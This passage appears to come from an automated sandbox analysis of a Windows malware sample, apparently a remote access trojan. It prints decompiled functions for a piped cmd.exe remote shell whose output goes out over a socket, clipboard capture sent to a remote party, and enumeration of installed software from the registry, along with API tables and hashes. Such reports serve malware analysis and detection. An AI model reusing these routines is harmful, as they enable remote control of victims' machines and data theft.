					_push(0x46dccc);
					_push(0x46dce4);
					 *0x46dc08 = 0xc;
					 *0x46dc10 = 1;
					 *0x46dc0c = _t98;
					if( *_t150() == 0) {
						goto L27;
					}
					_push(_t98);
					_push(0x46dc08);
					_push(0x46dcec);
					_push(0x46dcd0);
					if( *_t150() == 0) {
						goto L27;
					}
					_t151 = 0x44;
					E105C2D6E(0x46dc18, 0x46dc18, _t98, _t151);
					0x46dc18->cb = _t151;
					 *0x46dc44 = 0x101;
					 *0x46dc48 = 0;
					 *0x46dc50 =  *0x46dce4;
					_t79 =  *0x46dcec;
					 *0x46dc54 = _t79;
					 *0x46dc58 = _t79;
					_t80 = E10592E03(0x46dcf0);
					 *0x46bae2 = CreateProcessA(_t98, E10592E03(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4) != 0;
					E10596879(_t98, 0x46c2d0, 0x45f6bc);
					 *0x46bae3 = 1;
					E105957F9(0x46dc60);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E10595876(0x45f6c0);
					_t156 = _t156 + 0xc - 0xfffffffffffffff8;
					E10592F5A(_t98, _t156, 0x45f6c0, CreateProcessA(_t98, E10592E03(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4),  &_a4);
					_push(0x93);
					_t100 = 0x46dc60;
					_t147 = E10595912(_t98, 0x46dc60, 0x45f6c0, CreateProcessA(_t98, E10592E03(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4));
					Sleep(0x12c);
					if( *0x46bae2 == _t98) {
						goto L26;
					}
					_t139 = 0x46c2d0;
					do {
						goto L12;
						L21:
						_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
						_t100 = _t139;
						 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
						if(E105932F7() == 0) {
							_v8 = _t98;
						} else {
							E10596870(_t98, _t139, _t139, 0x45f6d8);
							E10592E1B( &_v40, _t139);
							_t52 = E105932F7();
							WriteFile( *0x46dccc, E10592E03(_t139), _t52,  &_v8, _t98);
							_t100 = _t139;
							E10596879(_t98, _t139, 0x45f6bc);
						}
						Sleep(0x64);
					} while ( *0x46bae3 != _t98);
					TerminateProcess(0x46dcd4->hProcess, _t98);
					CloseHandle( *0x46dcd8);
					CloseHandle( *0x46dcd4);
					goto L26;
				}
			}

0x10596461
0x10596465
0x10596467
0x10596469
0x10596471
0x10596479
0x10596480
0x10596486
0x1059648c
0x10596494
0x1059649e
0x105964a3
0x105964aa
0x105964af
0x1059648c
0x105964bb
0x105964c3
0x105964c9
0x105964cf
0x105964d6
0x105964e0
0x105964e7
0x105964ec
0x105964cf
0x105964ed
0x105964f0
0x105964f5
0x105964fa
0x10596503
0x10596679
0x1059667d
0x1059668a
0x10596693
0x10596735
0x1059673f
0x10596744
0x10596750
0x00000000
0x10596750
0x10596699
0x1059669c
0x105966a3
0x105966b3
0x105966bc
0x10596727
0x10596728
0x1059672e
0x00000000
0x1059672e
0x105966c1
0x105966f6
0x105966fa
0x105966ff
0x10596702
0x10596704
0x10596707
0x10596708
0x1059670c
0x10596720
0x10596722
0x00000000
0x10596722
0x105966d0
0x105966d5
0x105966d8
0x105966da
0x00000000
0x00000000
0x105966e0
0x105966eb
0x105966ee
0x105966f0
0x105966f1
0x00000000
0x10596509
0x10596510
0x10596515
0x10596517
0x105967f0
0x105967f5
0x10596800
0x1059680c
0x10596812
0x10596818
0x1059681a
0x1059681d
0x10596825
0x10596832
0x10596832
0x10596530
0x1059653c
0x10596541
0x1059654c
0x1059654d
0x1059654e
0x10596553
0x10596558
0x10596562
0x1059656c
0x10596576
0x00000000
0x00000000
0x1059657c
0x1059657d
0x1059657e
0x10596583
0x1059658c
0x00000000
0x00000000
0x10596594
0x1059659d
0x105965a5
0x105965ad
0x105965b7
0x105965cc
0x105965d1
0x105965d7
0x105965dc
0x105965e1
0x1059660a
0x10596611
0x1059661b
0x10596622
0x10596631
0x10596632
0x10596633
0x10596634
0x1059663c
0x10596641
0x1059664a
0x1059664f
0x10596654
0x10596660
0x10596662
0x1059666e
0x00000000
0x00000000
0x10596674
0x10596679
0x00000000
0x10596752
0x1059675d
0x10596760
0x10596762
0x1059676e
0x105967b4
0x10596770
0x10596777
0x10596780
0x1059678c
0x105967a0
0x105967ab
0x105967ad
0x105967ad
0x105967b9
0x105967bf
0x105967d2
0x105967de
0x105967ea
0x00000000
0x105967ea

APIs

__Init_thread_footer.LIBCMT ref: 105964AA

Part of subcall function 10595912: send.WS2_32(?,00000000,00000000,00000000), ref: 10595986

__Init_thread_footer.LIBCMT ref: 105964E7
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046DC18,0046DCD4), ref: 105965FB
Sleep.KERNEL32(0000012C,00000093,?), ref: 10596662
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1059668A
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 105966B3

Part of subcall function 105C030C: __onexit.LIBCMT ref: 105C0312

WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 105967A0
Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 105967B9
TerminateProcess.KERNEL32(00000000), ref: 105967D2
CloseHandle.KERNEL32 ref: 105967DE
CloseHandle.KERNEL32 ref: 105967EA
CloseHandle.KERNEL32 ref: 10596800
CloseHandle.KERNEL32 ref: 1059680C

Strings

cmd.exe, xrefs: 10596509

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$FileInit_thread_footerProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
String ID: cmd.exe
API String ID: 934506284-723907552
Opcode ID: 8950dcda3638024480c7a18c1cd1ed1f1aa0053088cfa9993a61d707bf24412b
Instruction ID: ff8563d0b8707b9a09e01589d2a6b646b482a716bd4f8eef2c7b4087b96245ba
Opcode Fuzzy Hash: 8950dcda3638024480c7a18c1cd1ed1f1aa0053088cfa9993a61d707bf24412b
Instruction Fuzzy Hash: 4191EA75F00208ABCB019BB4DD8AE6E3F79EB84741B10407AF405A7161EFF46E45D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00412CEE, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 83
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00412CEE(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					E00401E49( &_a16, _t55, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E00402489() + 2);
					_t20 = GlobalLock(_t57);
					E00401E49( &_a12, _t55, _t68, _t38);
					_t22 = E00402489();
					E004324E0(_t20, E00401F95(E00401E49( &_a8, _t55, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 : 0x45f724;
						E0040427F(_t38,  &_a36,  !=  ? _t31 : 0x45f724);
						_t55 =  &_a32;
						E0041739C(_t38, _t66 - 0x18,  &_a32);
						_push(0x6b);
						E00404AA4(_t38, 0x46c780,  &_a32, _t31);
						E00401EF0();
					}
				}
				_t7 =  &_a16; // 0x404538
				E00401E74(_t7, _t55);
				E00401FC7();
				E00401FC7();
				return 0;
			}

0x00412cee
0x00412cef
0x00412cf5
0x00412cf7
0x00412cfd
0x00412d08
0x00412d23
0x00412d26
0x00412d33
0x00412d3a
0x00412d53
0x00412d58
0x00412d5c
0x00412d65
0x00412d82
0x00412d91
0x00412d9f
0x00412da2
0x00412dab
0x00412db1
0x00412dbe
0x00412dc6
0x00412dce
0x00412dd4
0x00412dd9
0x00412de0
0x0041318d
0x0041318d
0x00412d91
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed

APIs

OpenClipboard.USER32 ref: 00412CEF
EmptyClipboard.USER32 ref: 00412CFD
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00412D1D
GlobalLock.KERNEL32 ref: 00412D26
GlobalUnlock.KERNEL32(00000000), ref: 00412D5C
SetClipboardData.USER32 ref: 00412D65
CloseClipboard.USER32 ref: 00412D82
OpenClipboard.USER32 ref: 00412D89
GetClipboardData.USER32 ref: 00412D99
GlobalLock.KERNEL32 ref: 00412DA2
GlobalUnlock.KERNEL32(00000000), ref: 00412DAB
CloseClipboard.USER32 ref: 00412DB1

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: 8E@
API String ID: 3520204547-787191786
Opcode ID: 404aa65ec40ebe7d1aded3c4467f276cb2d1509549b123ebf3c107b077ab3c0b
Instruction ID: b9e1d7fbe4d1e951bf5af5a2783573fa20d530b0938c210f703dd27beeaacb0f
Opcode Fuzzy Hash: 404aa65ec40ebe7d1aded3c4467f276cb2d1509549b123ebf3c107b077ab3c0b
Instruction Fuzzy Hash: B42165711043005BD305BF72DC499BE76A9AF94747F00043FF902A21E3DF388A04866A

Uniqueness

Uniqueness Score: -1.00%

Function 00418E5A, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00418E5A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x46beb8 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x46bec0);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x46bebc) == 0) {
							ShowWindow( *0x46bebc, 9);
							SetForegroundWindow( *0x46bebc);
						} else {
							ShowWindow( *0x46bebc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x46beb8, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}

0x00418e62
0x00418e65
0x00418f36
0x00418f43
0x00418f4b
0x00418f51
0x00000000
0x00418f51
0x00418e6b
0x00418e70
0x00418f1f
0x00000000
0x00000000
0x00418f28
0x00418f30
0x00418f30
0x00418e7b
0x00418e8b
0x00418e90
0x00418eed
0x00418f07
0x00418f13
0x00418eef
0x00418ef7
0x00418ef7
0x00000000
0x00418eed
0x00418e95
0x00418eb4
0x00418ebd
0x00418ed7
0x00000000
0x00418ed7
0x00418e97
0x00418e9a
0x00418e9d
0x00418ea2
0x00000000
0x00418ea5
0x00418e7d
0x00418e80
0x00418e83
0x00000000

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 00418EA5
GetCursorPos.USER32(?), ref: 00418EB4
SetForegroundWindow.USER32(?), ref: 00418EBD
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00418ED7
Shell_NotifyIconA.SHELL32(00000002,0046BEC0), ref: 00418F28
ExitProcess.KERNEL32 ref: 00418F30
CreatePopupMenu.USER32 ref: 00418F36
AppendMenuA.USER32 ref: 00418F4B

Strings

Close, xrefs: 00418F3C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 313875355ef37223d46e2d47b1dd1b85a0bcac7bde8e4359fd53db1a69d1d3b6
Instruction ID: fe3cc472e6e4562c17b13041cd06cea2fd9b767a49036bc03de1ccffac53e5cc
Opcode Fuzzy Hash: 313875355ef37223d46e2d47b1dd1b85a0bcac7bde8e4359fd53db1a69d1d3b6
Instruction Fuzzy Hash: 38210731104209BFDB064FA4ED0DAAA3B66EB04743F10452AFA05D41B1DFB6DAA1EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0043F5AB, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043F5AB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46a00c; // 0xee31ea10
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x4577b8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a38;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x457bb8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E0042FD1B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E0043F348(_t172, 1, 4);
					E004401F5(_t170);
					_v32 = E0043F348(_t172, 0x180, 2);
					E004401F5(_t170);
					_v36 = E0043F348(_t172, 0x180, 1);
					E004401F5(_t170);
					_v40 = E0043F348(_t172, 0x180, 1);
					E004401F5(_t170);
					_t197 = E0043F348(_t172, 0x101, 1);
					_v52 = _t197;
					E004401F5(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E004401F5(_v44);
						E004401F5(_v32);
						E004401F5(_v36);
						E004401F5(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E0044480C(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E0044480C(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E004493AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E004401F5( *(_t215 + 0x90) - 0xfe);
										E004401F5( *(_t215 + 0x94) - 0x80);
										E004401F5( *(_t215 + 0x98) - 0x80);
										E004401F5( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E004401F5(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0044B0F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x0043f5b3
0x0043f5ba
0x0043f5bf
0x0043f5c2
0x0043f5c5
0x0043f5c8
0x0043f5cb
0x0043f5d1
0x0043f5d4
0x0043f5d7
0x0043f5da
0x0043f5dd
0x0043f5e2
0x0043f902
0x0043f904
0x0043f906
0x0043f906
0x0043f909
0x0043f90f
0x0043f911
0x0043f917
0x0043f91d
0x0043f927
0x0043f931
0x0043f938
0x0043f948
0x0043f948
0x0043f5e8
0x0043f5eb
0x0043f5f0
0x0043f60e
0x0043f618
0x0043f61b
0x0043f62e
0x0043f631
0x0043f63f
0x0043f642
0x0043f650
0x0043f653
0x0043f664
0x0043f667
0x0043f66a
0x0043f66f
0x0043f675
0x0043f8c9
0x0043f8cc
0x0043f8d4
0x0043f8dc
0x0043f8e4
0x0043f8ee
0x0043f8ee
0x00000000
0x0043f69e
0x0043f69e
0x0043f6a0
0x0043f6a0
0x0043f6a3
0x0043f6a4
0x0043f6ba
0x00000000
0x00000000
0x0043f6c0
0x0043f6c3
0x0043f6c6
0x00000000
0x00000000
0x0043f6d3
0x0043f6d6
0x0043f6d9
0x0043f6f6
0x0043f6fb
0x0043f6fe
0x0043f700
0x00000000
0x00000000
0x0043f71a
0x0043f72a
0x0043f72f
0x0043f734
0x00000000
0x00000000
0x0043f73e
0x0043f76b
0x0043f781
0x0043f784
0x0043f789
0x0043f78e
0x00000000
0x00000000
0x0043f794
0x0043f799
0x0043f79f
0x0043f7a2
0x0043f7a5
0x0043f7a8
0x0043f7ab
0x0043f7ae
0x0043f7b5
0x0043f7b8
0x0043f7bb
0x0043f7bd
0x0043f7c3
0x0043f7c6
0x0043f7c8
0x0043f80a
0x0043f80c
0x0043f815
0x0043f81a
0x0043f81d
0x0043f827
0x0043f829
0x0043f82c
0x0043f82e
0x0043f837
0x0043f839
0x0043f83b
0x0043f83c
0x0043f847
0x0043f84c
0x0043f850
0x0043f85e
0x0043f871
0x0043f87f
0x0043f88a
0x0043f88f
0x0043f850
0x0043f892
0x0043f895
0x0043f89b
0x0043f8a4
0x0043f8a9
0x0043f8b2
0x0043f8bb
0x0043f8c4
0x0043f8ef
0x0043f8f2
0x00000000
0x0043f7cf
0x0043f7cf
0x0043f7d2
0x0043f7d2
0x0043f7d6
0x00000000
0x00000000
0x0043f7d8
0x0043f7e1
0x0043f7ff
0x0043f7ff
0x0043f805
0x00000000
0x00000000
0x00000000
0x0043f805
0x0043f7e9
0x0043f7ec
0x0043f7f1
0x0043f7f2
0x0043f7f5
0x0043f7fb
0x00000000
0x0043f7ec
0x00000000
0x0043f807
0x0043f745
0x0043f745
0x0043f748
0x0043f748
0x0043f74c
0x00000000
0x00000000
0x0043f74e
0x0043f752
0x0043f75f
0x0043f757
0x0043f75b
0x0043f75b
0x0043f75c
0x0043f75c
0x0043f763
0x0043f766
0x0043f769
0x00000000
0x00000000
0x00000000
0x0043f769
0x00000000
0x0043f748
0x0043f73e
0x0043f675
0x0043f5fe
0x0043f603
0x0043f608
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0043F61B
_free.LIBCMT ref: 0043F631
_free.LIBCMT ref: 0043F642
_free.LIBCMT ref: 0043F653
_free.LIBCMT ref: 0043F66A
GetCPInfo.KERNEL32(?,?), ref: 0043F6B2

Part of subcall function 0044B0F4: _free.LIBCMT ref: 0044B15F

_free.LIBCMT ref: 0043F85E
_free.LIBCMT ref: 0043F871
_free.LIBCMT ref: 0043F87F
_free.LIBCMT ref: 0043F88A
_free.LIBCMT ref: 0043F8CC
_free.LIBCMT ref: 0043F8D4
_free.LIBCMT ref: 0043F8DC
_free.LIBCMT ref: 0043F8E4
_free.LIBCMT ref: 0043F8F2

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 91b6e8db2eed5a3f9bc18157842a8c22ad8603507a8d278bced299eaa295a49f
Instruction ID: 1e5099d4cf7091294613e4cd6a63c328f2291409cd47a3a75e98f44bfb697c1d
Opcode Fuzzy Hash: 91b6e8db2eed5a3f9bc18157842a8c22ad8603507a8d278bced299eaa295a49f
Instruction Fuzzy Hash: FEB18E71D002059FEB15AFB9C881BEEBBB4BF08304F14407EE955A7352DB7998498B68

Uniqueness

Uniqueness Score: -1.00%

Function 00417C05, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00417C05(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					E00401F6D(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E004109BF( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E004109BF( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E004109BF( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E004109BF( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E004109BF( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E004109BF( &_v88, _v8);
								__eflags = E00409DB5();
								if(__eflags == 0) {
									E00403311(E004030A6(_t129,  &_v208, E004030A6(_t129,  &_v232, E00404429(_t129,  &_v256, E004030A6(_t129,  &_v280, E00404429(_t129,  &_v304, E004030A6(_t129,  &_v328, E00404429(_t129,  &_v352, E004030A6(_t129,  &_v376, E00404429(_t129,  &_v400, E004030A6(_t129,  &_v424, E00404429(_t129,  &_v448, E00407514( &_v472,  &_v40, __eflags, 0x4659c4), __eflags,  &_v160), _t206, __eflags, 0x4659c4), __eflags,  &_v112), _t206, __eflags, 0x4659c4), __eflags,  &_v184), _t206, __eflags, 0x4659c4), __eflags,  &_v136), _t206, __eflags, 0x4659c4), __eflags,  &_v88), _t206, __eflags, 0x4659c4), _t206, __eflags, "\n"));
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
								}
								RegCloseKey(_v8);
								E00401EF0();
								E00401EF0();
								E00401EF0();
								E00401EF0();
								E00401EF0();
								E00401EF0();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E0040331A(_t129, _t207, __eflags,  &_v64);
					E00401EF0();
				} else {
					E0040427F(__ebx, _t207, 0x45f724);
				}
				return _t207;
			}

0x00417c05
0x00417c25
0x00417c2f
0x00417c45
0x00417c4c
0x00417c4e
0x00417c58
0x00417c59
0x00417c5a
0x00417c5b
0x00417c5c
0x00417c63
0x00417c64
0x00417ed8
0x00417edb
0x00417ee1
0x00417ee6
0x00000000
0x00000000
0x00417c6a
0x00417c6c
0x00417ebe
0x00417ebe
0x00417ebe
0x00417ebf
0x00417c72
0x00417c87
0x00417c8d
0x00417c8f
0x00417ca0
0x00417cae
0x00417cb5
0x00417cc3
0x00417cca
0x00417cd8
0x00417cdf
0x00417cea
0x00417cf1
0x00417cfc
0x00417d03
0x00417d11
0x00417d13
0x00417df3
0x00417dfe
0x00417e09
0x00417e14
0x00417e1f
0x00417e2a
0x00417e35
0x00417e40
0x00417e4b
0x00417e56
0x00417e61
0x00417e6c
0x00417e77
0x00417e77
0x00417e7f
0x00417e88
0x00417e90
0x00417e9b
0x00417ea6
0x00417eb1
0x00417eb9
0x00000000
0x00417eb9
0x00417c8f
0x00417ec6
0x00417ec8
0x00417ec9
0x00417eca
0x00417ecb
0x00417ecf
0x00417ed6
0x00417ed7
0x00417ed7
0x00417eef
0x00417efb
0x00417f03
0x00417c31
0x00417c38
0x00417c38
0x00417f0f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00417C27
RegEnumKeyExA.ADVAPI32 ref: 00417EDB
RegCloseKey.ADVAPI32(?), ref: 00417EEF

Strings

